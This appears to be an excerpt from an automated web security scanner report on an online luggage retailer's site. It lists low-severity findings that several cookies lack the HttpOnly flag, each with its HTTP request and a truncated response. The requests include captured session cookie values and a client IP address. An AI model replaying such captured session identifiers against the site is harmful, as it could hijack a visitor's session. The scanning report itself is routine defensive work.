3.16. http://www.ebags.com/brand/kalencom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/kalencom

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/kalencom HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:21 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:21 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 103272


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.17. http://www.ebags.com/brand/lego  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/lego

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/lego HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:40 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:40 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 64901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.18. http://www.ebags.com/brand/lodis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/lodis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/lodis HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:23 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:23 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 112597


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.19. http://www.ebags.com/brand/michael-michael-kors-watches  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/michael-michael-kors-watches

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/michael-michael-kors-watches HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:26 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:26 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 106631


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.20. http://www.ebags.com/brand/quiksilver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/quiksilver

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/quiksilver HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:37 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:37 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 59111


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.21. http://www.ebags.com/brand/timi-and-leslie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/timi-and-leslie

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/timi-and-leslie HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:33 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:33 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 67781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.22. http://www.ebags.com/brands/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brands/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brands/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:11 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:03:11 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 280160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.23. http://www.ebags.com/category/backpack-handbags/20036676  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/backpack-handbags/20036676

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/backpack-handbags/20036676 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:49 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:49 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 111929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...

3.24. http://www.ebags.com/category/carry-on-luggage/20048891  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/carry-on-luggage/20048891

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/carry-on-luggage/20048891 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/department/bags-by-ebags
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373777|PC#1293371743230-938821.20#1294581517|check#true#1293371977; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1250; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":2,"to":3.7,"c":"http://www.ebags.com/department/bags-by-ebags","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1293371915878}; s_sq=ebagsprod%3D%2526pid%253DSub%252520Site%252520%25253A%252520Bags%252520by%252520eBags%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ebags.com%25252Fcategory%25252Fcarry-on-luggage%25252F20048891%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:10 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:10 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 58367


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.25. http://www.ebags.com/category/clutches/20036679  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/clutches/20036679

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/clutches/20036679 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:20 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:20 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 120095


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...

3.26. http://www.ebags.com/category/clutches/20048616  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/clutches/20048616

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/clutches/20048616 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:44 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:44 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 95952


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...

3.27. http://www.ebags.com/category/cross-body-bags/20037212  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/cross-body-bags/20037212

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/cross-body-bags/20037212 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:09:00 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:00 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 116072


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...

3.28. http://www.ebags.com/category/handbags/10014  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/handbags/10014

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/handbags/10014 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
